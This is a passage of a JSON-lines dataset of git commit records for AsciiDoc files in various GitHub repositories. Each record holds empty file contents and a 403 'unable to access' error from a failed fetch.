2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","new_file":"2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8658909c2a60b4afc39382333d94b86c71e7cd1b","subject":"Update 2016-12-21-Perfect-Salesforce-Developer-Interview.adoc","message":"Update 2016-12-21-Perfect-Salesforce-Developer-Interview.adoc","repos":"arshakian\/arshakian.github.io,arshakian\/arshakian.github.io,arshakian\/arshakian.github.io","old_file":"_posts\/2016-12-21-Perfect-Salesforce-Developer-Interview.adoc","new_file":"_posts\/2016-12-21-Perfect-Salesforce-Developer-Interview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arshakian\/arshakian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"582f44885b73048e9fce35b113cbf2382288f63c","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6b628a621c8e1a845974493387bc2e87a47e8e2","subject":"Update 2015-01-31-Hello-World.adoc","message":"Update 2015-01-31-Hello-World.adoc","repos":"jaslyn94\/jaslyn94.github.io,jaslyn94\/jaslyn94.github.io,jaslyn94\/jaslyn94.github.io","old_file":"_posts\/2015-01-31-Hello-World.adoc","new_file":"_posts\/2015-01-31-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/jaslyn94\/jaslyn94.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b383bfd29f4399393f93c3184c1066c96900d6e","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9297609be9f8f7472698beb0d3618a5d8ba38e7d","subject":"Update MicroServiceCasualTalk.adoc","message":"Update MicroServiceCasualTalk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/MicroServiceCasualTalk.adoc","new_file":"_posts\/MicroServiceCasualTalk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3e0bbb38e90ddcb5e1a67657a98a69218e6f98","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a643956af1e8ed972f8a5f8d7cf2e50dbe2bd838","subject":"Update 2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","message":"Update 2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","new_file":"_posts\/2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced70da4a6d2fa058b991ef61882bccc51fdfb24","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22f906687add187f1ae8b0104d2aacf3fcc13371","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 
2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3229d1f6c89367b706a0d34d6e091c051f9db88c","subject":"Add a blurb that the local server name needs to be unique.","message":"Add a blurb that the local server name needs to be unique.\n","repos":"jotak\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"946004aeed4ce2844c2cd14bbf2077b419de3c49","subject":"Impala integration doc: clarify partitioning recommendations","message":"Impala integration doc: clarify partitioning recommendations\n\nChange-Id: I67505f7a6aaa3c065877e742aaa7b77cf8394b55\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8714\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Dan Burkert 
<4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94e3796908f7f11c6522fd6f533dd4f0972394f5","subject":"Docs tests: cat\/health can have max_task_wait_time","message":"Docs tests: cat\/health can have max_task_wait_time\n\nMake the doc test assertions ok with a non `-` value for\n`max_task_wait_time`. These are rare, but possible:\nhttps:\/\/elasticsearch-ci.elastic.co\/job\/elastic+elasticsearch+master+multijob-unix-compatibility\/os=oraclelinux\/900\/consoleFull\n","repos":"masaruh\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,jimczi\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,nezirus\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,nezirus\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,shreejay\/elasticsearch,vroyer\/elassandra,brandonkearby\/elasticsearch,fred84\/elasticsearch,nezirus\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,nezirus\/elasti
csearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,shreejay\/elasticsearch,GlenRSmith\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,sneivandt\/elasticsearch,nknize\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,s1monw\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,jimczi\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,wenpos\/elasticsearch,masaruh\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,markwalkom\/elasticsearch","old_file":"docs\/reference\/cat\/health.asciidoc","new_file":"docs\/reference\/cat\/health.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f078fcaad4b3617034642e7bb65a0bb8df53f41d","subject":"y2b create post The Most RIDICULOUS MacBook Pro","message":"y2b create post The Most RIDICULOUS MacBook 
Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-05-The-Most-RIDICULOUS-MacBook-Pro.adoc","new_file":"_posts\/2018-01-05-The-Most-RIDICULOUS-MacBook-Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b73473604866b4f16e9c794d697c76b89adfca6","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be2351b6a2d888f73a40034dc908d3adf1326f43","subject":"y2b create post 3 Cool Tech Deals - #6","message":"y2b create post 3 Cool Tech Deals - #6","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-08-3-Cool-Tech-Deals--6.adoc","new_file":"_posts\/2015-08-08-3-Cool-Tech-Deals--6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3d8184716c81b2bce68ab62b7c4612aab3dca54","subject":"Update 2017-01-30-But-I-want-it-my-way.adoc","message":"Update 2017-01-30-But-I-want-it-my-way.adoc","repos":"crobby\/hubpress.io,crobby\/hubpress.io,crobby\/hubpress.io,crobby\/hubpress.io","old_file":"_posts\/2017-01-30-But-I-want-it-my-way.adoc","new_file":"_posts\/2017-01-30-But-I-want-it-my-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crobby\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"092dea99fc78f73702380fe78e1a145ab7223e3a","subject":"DBZ-2646 Add k8s deployment doc","message":"DBZ-2646 Add k8s deployment doc\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/operations\/kubernates.adoc","new_file":"documentation\/modules\/ROOT\/pages\/operations\/kubernates.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"475671982d24022c9f79dd572ce370ca5350273a","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"8df8448619f68caaaa190aa37539266ea6abb6a4","subject":"Update 2017-07-26-Git-merge-vs-Git-rebase.adoc","message":"Update 2017-07-26-Git-merge-vs-Git-rebase.adoc","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-07-26-Git-merge-vs-Git-rebase.adoc","new_file":"_posts\/2017-07-26-Git-merge-vs-Git-rebase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Elvisz\/elvisz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eeab5feeedf34de986a397950fe94e4496b0fa16","subject":"Update 2016-02-22-Ground-Zero.adoc","message":"Update 2016-02-22-Ground-Zero.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-22-Ground-Zero.adoc","new_file":"_posts\/2016-02-22-Ground-Zero.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab2d9cc65b2fc52f4b6e2c12793fd2f277e86608","subject":"Update 2016-07-24-Tytul-wpisu.adoc","message":"Update 2016-07-24-Tytul-wpisu.adoc","repos":"kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm","old_file":"_posts\/2016-07-24-Tytul-wpisu.adoc","new_file":"_posts\/2016-07-24-Tytul-wpisu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kornel661\/blog-test-jm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"516ba6c8f67afc3719520e7a09fb83a48a242d2b","subject":"Using gcloud CLI as gcutil CLI has been deprecated","message":"Using gcloud CLI as gcutil CLI has been 
deprecated\n","repos":"wittyameta\/elasticsearch,drewr\/elasticsearch,cwurm\/elasticsearch,wangtuo\/elasticsearch,yanjunh\/elasticsearch,naveenhooda2000\/elasticsearch,ZTE-PaaS\/elasticsearch,vietlq\/elasticsearch,vietlq\/elasticsearch,nomoa\/elasticsearch,adrianbk\/elasticsearch,mbrukman\/elasticsearch,ivansun1010\/elasticsearch,ckclark\/elasticsearch,elancom\/elasticsearch,lzo\/elasticsearch-1,liweinan0423\/elasticsearch,petabytedata\/elasticsearch,mbrukman\/elasticsearch,Stacey-Gammon\/elasticsearch,rmuir\/elasticsearch,henakamaMSFT\/elasticsearch,coding0011\/elasticsearch,MichaelLiZhou\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,JackyMai\/elasticsearch,yanjunh\/elasticsearch,hafkensite\/elasticsearch,a2lin\/elasticsearch,glefloch\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,ulkas\/elasticsearch,alexshadow007\/elasticsearch,Charlesdong\/elasticsearch,HonzaKral\/elasticsearch,snikch\/elasticsearch,Shepard1212\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,avikurapati\/elasticsearch,socialrank\/elasticsearch,wittyameta\/elasticsearch,jbertouch\/elasticsearch,StefanGor\/elasticsearch,robin13\/elasticsearch,JackyMai\/elasticsearch,girirajsharma\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,xingguang2013\/elasticsearch,polyfractal\/elasticsearch,nilabhsagar\/elasticsearch,StefanGor\/elasticsearch,spiegela\/elasticsearch,nellicus\/elasticsearch,sreeramjayan\/elasticsearch,Rygbee\/elasticsearch,YosuaMichael\/elasticsearch,MetSystem\/elasticsearch,rlugojr\/elasticsearch,yynil\/elasticsearch,bestwpw\/elasticsearch,fforbeck\/elasticsearch,PhaedrusTheGreek\/elasticsearch,socialrank\/elasticsearch,masaruh\/elasticsearch,vietlq\/elasticsearch,gingerwizard\/elasticsearch,mm0\/elasticsearch,caengcjd\/elasticsearch,Charlesdong\/elasticsearch,bestwpw\/elasticsearch,fforbeck\/elasticsearch,vroyer\/elasticassandra,camilojd\/elasticsearch,huanzhong\/elasticsearch,Rygbee\/elasticsearch,ivansun1010\/elasticsearch,mjason3\/elasticsearch,mcku\/elasticsearch,scorpionvicky\/elasticsearch,sreeramjayan\/elasticsearch,mapr\/elasticsearch,franklanganke\/elasticsearch,KimTaehee\/elasticsearch,cnfire\/elasticsearch-1,shreejay\/elasticsearch,ulkas\/elasticsearch,shreejay\/elasticsearch,liweinan0423\/elasticsearch,gmarz\/elasticsearch,StefanGor\/elasticsearch,clintongormley\/elasticsearch,infusionsoft\/elasticsearch,knight1128\/elasticsearch,elancom\/elasticsearch,umeshdangat\/elasticsearch,awislowski\/elasticsearch,lmtwga\/elasticsearch,brandonkearby\/elasticsearch,iacdingping\/elasticsearch,mohit\/elasticsearch,nrkkalyan\/elasticsearch,mmaracic\/elasticsearch,snikch\/elasticsearch,Rygbee\/elasticsearch,njlawton\/elasticsearch,naveenhooda2000\/elasticsearch,artnowo\/elasticsearch,adrianbk\/elasticsearch,jango2015\/elasticsearch,i-am-Nathan\/elasticsearch,bestwpw\/elasticsearch,schonfeld\/elasticsearch,yynil\/elasticsearch,bawse\/elasticsearch,liweinan0423\/elasticsearch,kalburgimanjunath\/elasticsearch,rmuir\/elasticsearch,AndreKR\/elasticsearch,gfyoung\/elasticsearch,geidies\/elasticsearch,gfyoung\/elasticsearch,mapr\/elasticsearch,clintongormley\/elasticsearch,schonfeld\/elasticsearch,lzo\/elasticsearch-1,masaruh\/elasticsearch,mgalushka\/elasticsearch,umeshdangat\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,elasticdog\/elasticsearch,franklanganke\/elasticsearch,myelin\/elasticsearch,drewr\/elasticsearch,JackyMai\/elasticsearch,mnylen\/elasticsearch,bawse\/elasticsearch,wbowling\/elasticsearch,gingerwizard\/elasticsearch,ri
cardocerq\/elasticsearch,onegambler\/elasticsearch,mikemccand\/elasticsearch,jprante\/elasticsearch,KimTaehee\/elasticsearch,fforbeck\/elasticsearch,trangvh\/elasticsearch,naveenhooda2000\/elasticsearch,knight1128\/elasticsearch,franklanganke\/elasticsearch,sdauletau\/elasticsearch,petabytedata\/elasticsearch,KimTaehee\/elasticsearch,myelin\/elasticsearch,episerver\/elasticsearch,xuzha\/elasticsearch,gingerwizard\/elasticsearch,ckclark\/elasticsearch,andrestc\/elasticsearch,YosuaMichael\/elasticsearch,lzo\/elasticsearch-1,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,C-Bish\/elasticsearch,achow\/elasticsearch,iacdingping\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,jimczi\/elasticsearch,martinstuga\/elasticsearch,JervyShi\/elasticsearch,mortonsykes\/elasticsearch,ckclark\/elasticsearch,tebriel\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,wuranbo\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,weipinghe\/elasticsearch,knight1128\/elasticsearch,Stacey-Gammon\/elasticsearch,mbrukman\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,ckclark\/elasticsearch,caengcjd\/elasticsearch,dpursehouse\/elasticsearch,franklanganke\/elasticsearch,weipinghe\/elasticsearch,camilojd\/elasticsearch,karthikjaps\/elasticsearch,snikch\/elasticsearch,diendt\/elasticsearch,franklanganke\/elasticsearch,jimczi\/elasticsearch,sdauletau\/elasticsearch,nellicus\/elasticsearch,karthikjaps\/elasticsearch,kaneshin\/elasticsearch,pozhidaevak\/elasticsearch,yynil\/elasticsearch,vietlq\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,ivansun1010\/elasticsearch,gmarz\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masterweb121\/elasticsearch,C-Bish\/elasticsearch,LeoYao\/elasticsearch,caengcjd\/elasticsearch,MetSystem\/elasticsearch,MisterAndersen\/elasticsearch,wangtuo\/elasticsearch,rhoml\/elasticsearch,wbowling\/elasticsearch,tebriel\/elasticsearch,schonfeld\/elasticsearch,nomoa\/elasticsearch,coding0011\/elasticsearch,areek\/elasticsearch,masterweb121\/elasticsearch,myelin\/elasticsearch,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,martinstuga\/elasticsearch,wittyameta\/elasticsearch,rhoml\/elasticsearch,markwalkom\/elasticsearch,Rygbee\/elasticsearch,elancom\/elasticsearch,sreeramjayan\/elasticsearch,rhoml\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mm0\/elasticsearch,njlawton\/elasticsearch,karthikjaps\/elasticsearch,elasticdog\/elasticsearch,sneivandt\/elasticsearch,myelin\/elasticsearch,schonfeld\/elasticsearch,achow\/elasticsearch,rajanm\/elasticsearch,ouyangkongtong\/elasticsearch,sdauletau\/elasticsearch,markharwood\/elasticsearch,dongjoon-hyun\/elasticsearch,adrianbk\/elasticsearch,cnfire\/elasticsearch-1,trangvh\/elasticsearch,spiegela\/elasticsearch,mikemccand\/elasticsearch,avikurapati\/elasticsearch,jchampion\/elasticsearch,jango2015\/elasticsearch,hafkensite\/elasticsearch,JSCooke\/elasticsearch,awislowski\/elasticsearch,kalburgimanjunath\/elasticsearch,MetSystem\/elasticsearch,JSCooke\/elasticsearch,ivansun1010\/elasticsearch,mmaracic\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,LeoYao\/elasticsearch,camilojd\/elasticsearch,s1monw\/elasticsearch,achow\/elasticsearch,dpursehouse\/elasticsea